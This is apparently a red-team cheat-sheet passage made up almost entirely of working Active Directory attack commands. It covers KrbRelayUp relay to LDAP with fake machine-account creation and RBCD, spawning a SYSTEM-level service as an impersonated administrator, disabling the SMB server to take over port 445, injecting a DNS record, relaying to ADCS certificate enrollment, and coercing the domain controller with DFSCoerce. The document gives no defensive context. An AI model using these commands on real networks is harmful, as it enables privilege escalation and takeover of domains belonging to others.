Relay authentication to LDAP(S) with automatic machine creation and configure RBCD:
Copy PS > .\KrbRelayUp.exe RELAY [-d|--Domain megacorp.local] [-dc|--DomainController DC01.megacorp.local] [-m|--Method RBCD] -c|--CreateNewComputerAccount [-cn|--ComputerName FAKEMACHINE$] [-cp|--ComputerPassword Passw0rd!]
Copy PS > .\KrbRelayUp.exe RELAY -u2u -cn j.doe -cp Passw0rd!
Copy PS > .\KrbRelayUp.exe SPAWN [-m|--Method RBCD] [-i|--Impersonate administrator] [-s|ServiceName PwnSVC] [-sc|--ServiceCommand C:\Windows\System32\cmd.exe] -cn|--ComputerName FAKEMACHINE$ -cp|--ComputerPassword Passw0rd! [or -ch|--ComputerPasswordHash fc525c9683e8fe067095ba2ddc971889]
Copy Cmd > sc config LanmanServer start= disabled & sc stop LanmanServer & sc stop srv2 & sc stop srvnet
Cmd > sc config LanmanServer start= auto & sc start LanmanServer & sc start srv2 & sc start srvnet
Copy PS > Invoke-DNSUpdate -DNSName adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -DNSData 10.10.13.37
PS > Set-Service -Name LanmanServer -StartupType Disabled; Stop-Service -Name LanmanServer -Force; Stop-Service -Name srv2 -Force; Stop-Service -Name srvnet -Force
PS > .\KrbRelay.exe -spn HTTP/ADCS.megacorp.local -redirecthost adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 445
$ dfscoerce.py -d megacorp.local -u snovvcrash -k -no-pass adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.megacorp.local
PS > Set-Service -Name LanmanServer -StartupType Automatic; Start-Service -Name LanmanServer; Start-Service -Name srv2; Start-Service -Name srvnet 